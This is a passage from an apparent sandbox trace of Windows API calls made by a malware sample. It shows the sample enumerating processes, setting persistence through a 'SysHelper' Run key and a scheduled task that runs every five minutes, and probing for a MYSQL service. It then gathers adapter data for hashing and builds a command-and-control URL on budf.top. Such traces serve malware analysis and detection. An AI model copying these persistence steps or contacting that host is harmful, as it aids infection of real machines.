dwProcessId=0x9f4) returned 0x5a8 [0091.344] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.345] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1090000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="refuse lodging.exe") returned 0x12 [0091.346] CloseHandle (hObject=0x5a8) returned 1 [0091.346] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x0 [0091.346] CloseHandle (hObject=0x0) returned 0 [0091.346] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa54) returned 0x0 [0091.346] CloseHandle (hObject=0x0) returned 0 [0091.346] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x0 [0091.346] CloseHandle (hObject=0x0) returned 0 [0091.346] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x114) returned 0x5a8 [0091.346] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.347] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x400000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 0x7f [0091.347] CloseHandle (hObject=0x5a8) returned 1 [0091.347] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x0 [0091.347] CloseHandle (hObject=0x0) returned 0 [0091.348] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x0 [0091.348] CloseHandle (hObject=0x0) returned 0 [0091.348] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x0 [0091.348] CloseHandle (hObject=0x0) returned 0 [0091.354] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x28) returned 0x26a390 [0091.354] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31b86e8 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a6fa0 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a7208 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a7470 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a76d8 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a7940 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a7ba8 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a7e10 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a8078 [0091.355] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a82e0 [0091.363] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18e2d0 | out: phkResult=0x18e2d0*=0x5a8) returned 0x0 [0091.363] RegQueryValueExW (in: hKey=0x5a8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18e2cc, lpData=0x18c9f8, lpcbData=0x18e2b0*=0x400 | out: lpType=0x18e2cc*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart", lpcbData=0x18e2b0*=0x1be) returned 0x0 [0091.363] RegCloseKey (hKey=0x5a8) returned 0x0 [0091.363] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1c0) returned 0x31b8950 [0091.363] lstrlenA (lpString="\" --AutoStart") returned 13 [0091.363] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1b0) returned 0x31a8548 [0091.363] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b8950 | out: hHeap=0x240000) returned 1 [0091.363] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 1 [0091.363] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1b0) returned 0x31b8950 [0091.363] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a8548 | out: hHeap=0x240000) returned 1 [0091.363] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1b0) returned 0x31a8548 [0091.363] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1b0) returned 0x31a8700 [0091.363] CoInitialize (pvReserved=0x0) returned 0x0 [0091.375] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0091.376] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1b0) returned 0x31a8a90 [0091.376] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18e2bc | out: ppv=0x18e2bc*=0x28b08b8) returned 0x0 [0091.383] TaskScheduler:ITaskService:Connect (This=0x28b08b8, serverName=0x18dd48*(varType=0x0, wReserved1=0x31a, wReserved2=0x8540, wReserved3=0x31a, varVal1=0xd7, varVal2=0x1b0), user=0x18dd58*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x1b8), domain=0x18dd68*(varType=0x0, wReserved1=0x0, wReserved2=0x1b0, wReserved3=0x0, varVal1=0xd7, varVal2=0x7), password=0x18dd78*(varType=0x0, wReserved1=0x31a, wReserved2=0xe264, wReserved3=0x18, varVal1=0x420cab, varVal2=0x240000)) returned 0x0 [0091.386] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7318 [0091.386] TaskScheduler:ITaskService:GetFolder (in: This=0x28b08b8, Path="\\", ppFolder=0x18e2c4 | out: ppFolder=0x18e2c4*=0x28b0920) returned 0x0 [0091.388] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7318 | out: hHeap=0x240000) returned 1 [0091.388] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7318 [0091.388] ITaskFolder:DeleteTask (This=0x28b0920, Name="Time Trigger Task", flags=0) returned 0x0 [0091.448] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7318 | out: hHeap=0x240000) returned 1 [0091.448] TaskScheduler:ITaskService:NewTask (in: This=0x28b08b8, flags=0x0, ppDefinition=0x18e2c8 | out: ppDefinition=0x18e2c8*=0x28b0950) returned 0x0 [0091.449] TaskScheduler:IUnknown:Release (This=0x28b08b8) returned 0x1 [0091.449] ITaskDefinition:get_RegistrationInfo (in: This=0x28b0950, ppRegistrationInfo=0x18e29c | out: ppRegistrationInfo=0x18e29c*=0x28b0a10) returned 0x0 [0091.449] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.449] IRegistrationInfo:put_Author (This=0x28b0a10, Author="Author Name") returned 0x0 [0091.449] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.449] IUnknown:Release (This=0x28b0a10) returned 0x1 [0091.449] ITaskDefinition:get_Principal (in: This=0x28b0950, ppPrincipal=0x18e2a4 | out: ppPrincipal=0x18e2a4*=0x28b0ba0) returned 0x0 [0091.449] IPrincipal:put_LogonType (This=0x28b0ba0, LogonType=3) returned 0x0 [0091.449] IUnknown:Release (This=0x28b0ba0) returned 0x1 [0091.449] ITaskDefinition:get_Settings (in: This=0x28b0950, ppSettings=0x18e2ac | out: ppSettings=0x18e2ac*=0x28b0ac0) returned 0x0 [0091.449] ITaskSettings:put_StartWhenAvailable (This=0x28b0ac0, StartWhenAvailable=1) returned 0x0 [0091.449] IUnknown:Release (This=0x28b0ac0) returned 0x1 [0091.449] ITaskSettings:get_IdleSettings (in: This=0x28b0ac0, ppIdleSettings=0x18e290 | out: ppIdleSettings=0x18e290*=0x28b0b30) returned 0x0 [0091.450] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.450] IIdleSettings:put_WaitTimeout (This=0x28b0b30, WaitTimeout="PT5M") returned 0x0 [0091.450] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.450] IUnknown:Release (This=0x28b0b30) returned 0x1 [0091.450] ITaskDefinition:get_Triggers (in: This=0x28b0950, ppTriggers=0x18e28c | out: ppTriggers=0x18e28c*=0x28b0a80) returned 0x0 [0091.450] ITriggerCollection:Create (in: This=0x28b0a80, Type=1, ppTrigger=0x18e298 | out: ppTrigger=0x18e298*=0x28b0c00) returned 0x0 [0091.450] IUnknown:Release (This=0x28b0a80) returned 0x1 [0091.450] IUnknown:QueryInterface (in: This=0x28b0c00, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18e2b4 | out: ppvObject=0x18e2b4*=0x28b0c00) returned 0x0 [0091.450] IUnknown:Release (This=0x28b0c00) returned 0x2 [0091.450] ITrigger:get_Repetition (in: This=0x28b0c00, ppRepeat=0x18e2a0 | out: ppRepeat=0x18e2a0*=0x28b0c50) returned 0x0 [0091.450] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.450] IRepetitionPattern:put_Interval (This=0x28b0c50, Interval="PT5M") returned 0x0 [0091.450] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.450] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.450] IRepetitionPattern:put_Duration (This=0x28b0c50, Duration="") returned 0x0 [0091.451] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.451] ITrigger:put_Repetition (This=0x28b0c00, Repetition=0x28b0c50) returned 0x0 [0091.451] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.451] ITrigger:put_Id (This=0x28b0c00, Id="Trigger1") returned 0x0 [0091.451] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.451] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.451] ITrigger:put_EndBoundary (This=0x28b0c00, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0091.451] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18dd74 | out: lpSystemTimeAsFileTime=0x18dd74*(dwLowDateTime=0x37bbf880, dwHighDateTime=0x1d60a66)) [0091.458] GetLastError () returned 0x0 [0091.458] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x24) returned 0x31cad90 [0091.458] GetLastError () returned 0x0 [0091.458] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0091.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18dcdc | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18dcdc) returned 26 [0091.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18dcdc | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18dcdc) returned 26 [0091.460] GetLastError () returned 0x0 [0091.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x24) returned 0x31cac10 [0091.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x31cac10, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0091.460] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xa0) returned 0x2de430 [0091.460] GetLastError () returned 0x0 [0091.460] ITrigger:put_StartBoundary (This=0x28b0c00, StartBoundary="2020-04-04T20:50:18") returned 0x0 [0091.460] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.460] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31ae0c8 | out: hHeap=0x240000) returned 1 [0091.460] IUnknown:Release (This=0x28b0c00) returned 0x1 [0091.460] ITaskDefinition:get_Actions (in: This=0x28b0950, ppActions=0x18e2a8 | out: ppActions=0x18e2a8*=0x28b09c8) returned 0x0 [0091.461] IActionCollection:Create (in: This=0x28b09c8, Type=0, ppAction=0x18e294 | out: ppAction=0x18e294*=0x28b0c98) returned 0x0 [0091.461] IUnknown:Release (This=0x28b09c8) returned 0x1 [0091.461] IUnknown:QueryInterface (in: This=0x28b0c98, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18e2b0 | out: ppvObject=0x18e2b0*=0x28b0c98) returned 0x0 [0091.461] IUnknown:Release (This=0x28b0c98) returned 0x2 [0091.461] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.461] IExecAction:put_Path (This=0x28b0c98, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 0x0 [0091.461] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.461] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.461] IExecAction:put_Arguments (This=0x28b0c98, Arguments="--Task") returned 0x0 [0091.461] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.461] IUnknown:Release (This=0x28b0c98) returned 0x1 [0091.461] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x31b7348 [0091.461] ITaskFolder:RegisterTaskDefinition (in: This=0x28b0920, Path="Time Trigger Task", pDefinition=0x28b0950, flags=6, UserId=0x18dd50*(varType=0x0, wReserved1=0x31a, wReserved2=0xe264, wReserved3=0x18, varVal1=0x420cab, varVal2=0x240000), password=0x18dd60*(varType=0x0, wReserved1=0x0, wReserved2=0x1b0, wReserved3=0x0, varVal1=0xd7, varVal2=0x7), LogonType=3, sddl=0x18dd74*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x1b8), ppTask=0x18e27c | out: ppTask=0x18e27c*=0x28b0d18) returned 0x0 [0091.526] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b7348 | out: hHeap=0x240000) returned 1 [0091.526] TaskScheduler:IUnknown:Release (This=0x28b0920) returned 0x0 [0091.526] TaskScheduler:IUnknown:Release (This=0x28b0950) returned 0x0 [0091.526] IUnknown:Release (This=0x28b0d18) returned 0x0 [0091.526] CoUninitialize () [0091.527] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x240000) returned 1 [0091.527] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a8700 | out: hHeap=0x240000) returned 1 [0091.527] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a8548 | out: hHeap=0x240000) returned 1 [0091.527] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2972c0 [0091.528] OpenServiceW (hSCManager=0x2972c0, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x40) returned 0x31a2798 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a9c88 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a8548 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31a87b0 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31aa7c8 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31aaa30 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31aac98 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bdb70 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bddd8 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31be040 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31be2a8 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31be510 [0091.528] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31be778 [0091.529] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31be9e0 [0091.529] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bec48 [0091.529] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31beeb0 [0091.529] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bf118 [0091.529] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xa0) returned 0x2de430 [0091.529] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x110) returned 0x31a9ef0 [0091.529] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2de430 | out: hHeap=0x240000) returned 1 [0091.529] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x110) returned 0x316c098 [0091.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x2929c0, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0x9ac) returned 0x5b8 [0091.762] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a9ef0 | out: hHeap=0x240000) returned 1 [0091.762] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x28) returned 0x31cac10 [0091.762] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bf380 [0091.762] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bf5e8 [0091.762] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bf850 [0091.762] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bfab8 [0091.762] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bfd20 [0091.762] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31bff88 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31c01f0 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31c0458 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31c06c0 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31c0928 [0091.763] lstrlenA (lpString="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned 46 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x5e) returned 0x31cd30 [0091.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31bf380, cbMultiByte=-1, lpWideCharStr=0x31cd30, cchWideChar=47 | out: lpWideCharStr="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned 47 [0091.763] lstrcatW (in: lpString1="", lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.763] lstrlenA (lpString="") returned 0 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x31422f0 [0091.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31bf5e8, cbMultiByte=-1, lpWideCharStr=0x31422f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.763] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.763] lstrlenA (lpString="") returned 0 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x31422c0 [0091.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31bf850, cbMultiByte=-1, lpWideCharStr=0x31422c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.763] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.763] lstrlenA (lpString="") returned 0 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x3142360 [0091.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31bfab8, cbMultiByte=-1, lpWideCharStr=0x3142360, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.763] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.763] lstrlenA (lpString="") returned 0 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x3142310 [0091.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31bfd20, cbMultiByte=-1, lpWideCharStr=0x3142310, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.763] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.763] lstrlenA (lpString="") returned 0 [0091.763] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x3142320 [0091.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31bff88, cbMultiByte=-1, lpWideCharStr=0x3142320, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.764] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.764] lstrlenA (lpString="") returned 0 [0091.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x3142380 [0091.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c01f0, cbMultiByte=-1, lpWideCharStr=0x3142380, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.764] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.764] lstrlenA (lpString="") returned 0 [0091.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x3142330 [0091.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c0458, cbMultiByte=-1, lpWideCharStr=0x3142330, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.764] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.764] lstrlenA (lpString="") returned 0 [0091.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x3142340 [0091.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c06c0, cbMultiByte=-1, lpWideCharStr=0x3142340, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.764] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.764] lstrlenA (lpString="") returned 0 [0091.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x2) returned 0x3142350 [0091.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c0928, cbMultiByte=-1, lpWideCharStr=0x3142350, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.764] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0091.764] lstrlenW (lpString="") returned 0 [0091.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x12) returned 0x2663d0 [0091.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x288) returned 0x31ae0c8 [0091.764] GetAdaptersInfo (in: AdapterInfo=0x31ae0c8, SizePointer=0x18e294 | out: AdapterInfo=0x31ae0c8, SizePointer=0x18e294) returned 0x0 [0091.816] GetAdaptersInfo (in: AdapterInfo=0x31ae0c8, SizePointer=0x18e294 | out: AdapterInfo=0x31ae0c8, SizePointer=0x18e294) returned 0x0 [0091.868] GetLastError () returned 0x0 [0091.875] GetLastError () returned 0x0 [0091.876] CryptAcquireContextW (in: phProv=0x18e264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e264*=0x29f850) returned 1 [0091.905] CryptCreateHash (in: hProv=0x29f850, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e26c | out: phHash=0x18e26c) returned 1 [0091.905] CryptHashData (hHash=0x31c48f0, pbData=0x31d38c0, dwDataLen=0x11, dwFlags=0x0) returned 1 [0091.905] CryptGetHashParam (in: hHash=0x31c48f0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e268, dwFlags=0x0 | out: pbData=0x0, 